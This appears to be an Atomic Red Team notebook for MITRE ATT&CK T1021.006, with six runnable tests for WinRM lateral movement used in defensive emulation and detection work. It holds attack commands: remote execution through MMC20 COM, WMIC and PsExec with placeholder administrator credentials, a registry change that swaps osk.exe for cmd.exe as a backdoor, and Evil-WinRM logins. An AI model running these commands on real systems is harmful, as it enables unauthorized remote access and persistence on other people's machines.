{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1021.006 - Remote Services: Windows Remote Management",
    "\n",
    "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Enable Windows Remote Management\nPowershell Enable WinRM\n\nUpon successful execution, powershell will \"Enable-PSRemoting\" allowing for remote PS access.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nEnable-PSRemoting -Force\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - PowerShell Lateral Movement\nPowershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon successful execution, cmd will spawn calc.exe on a remote computer.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"computer1\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - WMIC Process Call Create\nUtilize WMIC to start remote process.\n\nUpon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nwmic /user:DOMAIN\\Administrator /password:P@ssw0rd1 /node:Target process call create \"C:\\Windows\\system32\\reg.exe add \\\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\\" /v \\\"Debugger\\\" /t REG_SZ /d \\\"cmd.exe\\\" /f\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - Psexec\nUtilize psexec to start remote process.\n\nUpon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system.\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `None`!\n##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n\n##### Check Prereq Commands:\n```None\nif (Test-Path \"C:\\PSTools\\PsExec.exe\") { exit 0} else { exit 1}\n\n```\n##### Get Prereq Commands:\n```None\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (\"C:\\PSTools\\PsExec.exe\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"C:\\PSTools\\PsExec.exe\" -Force\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 4 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nC:\\PSTools\\PsExec.exe \\\\localhost -accepteula -u DOMAIN\\Administrator -p P@ssw0rd1 -s cmd.exe\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - Invoke-Command\nExecute Invoke-command on remote host.\n\nUpon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\ninvoke-command -ComputerName localhost -scriptblock {ipconfig}\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - WinRM Access with Evil-WinRM\nAn adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies:  Run with `powershell`!\n##### Description: Computer must have Ruby Installed\n##### Check Prereq Commands:\n```powershell\nif (ruby -v) {exit 0} else {exit 1}\n```\n##### Get Prereq Commands:\n```powershell\nInvoke-WebRequest  -OutFile $env:Temp\\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe\n$file1= $env:Temp + \"\\rubyinstaller-2.7.1-1-x64.exe\"\nStart-Process $file1 /S;\n```\n##### Description: Computer must have Evil-WinRM installed\n##### Check Prereq Commands:\n```powershell\nif (evil-winrm -h) {exit 0} else {exit 1}\n```\n##### Get Prereq Commands:\n```powershell\ngem install evil-winrm\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 6 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\nevil-winrm -i Target -u Domain\\Administrator -p P@ssw0rd1```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1021.006 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}